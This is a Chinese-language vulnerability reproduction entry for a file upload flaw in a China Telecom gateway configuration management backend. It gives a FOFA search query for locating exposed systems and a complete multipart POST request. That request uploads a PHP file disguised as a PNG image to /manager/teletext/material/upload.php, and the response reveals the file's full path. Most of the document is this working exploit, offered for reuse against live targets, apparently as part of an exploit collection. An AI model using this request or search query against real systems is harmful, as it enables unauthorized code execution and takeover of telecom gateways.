D10-1电信-网关配置管理系统后台-文件上传
漏洞描述:
电信网关配置管理系统后台 /manager/teletext/material/upload.php 接口存在文件上传漏洞,攻击者可以利用文件上传漏洞获取系统权限。
网站图片:
网络测绘:
fofa语法:
FOFA:body=“img/login_bg3.png” && body=“系统登录”
漏洞复现:
payload:
POST /manager/teletext/material/upload.php HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryssh7UfnPpGU7BXfK
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
------WebKitFormBoundaryssh7UfnPpGU7BXfK
Content-Disposition: form-data; name="fileToUpload"; filename="a.php"
Content-Type: image/png
<?php phpinfo(); ?>
------WebKitFormBoundaryssh7UfnPpGU7BXfK
Content-Disposition: form-data; name="type"
img
------WebKitFormBoundaryssh7UfnPpGU7BXfK
Content-Disposition: form-data; name="w"
1280
------WebKitFormBoundaryssh7UfnPpGU7BXfK
Content-Disposition: form-data; name="h"
720
------WebKitFormBoundaryssh7UfnPpGU7BXfK
Content-Disposition: form-data; name="userid"
10003xx
------WebKitFormBoundaryssh7UfnPpGU7BXfK
Content-Disposition: form-data; name="appid"
5
------WebKitFormBoundaryssh7UfnPpGU7BXfK
Content-Disposition: form-data; name="uploadtime"
------WebKitFormBoundaryssh7UfnPpGU7BXfK--
效果图:
回显了完整路径
验证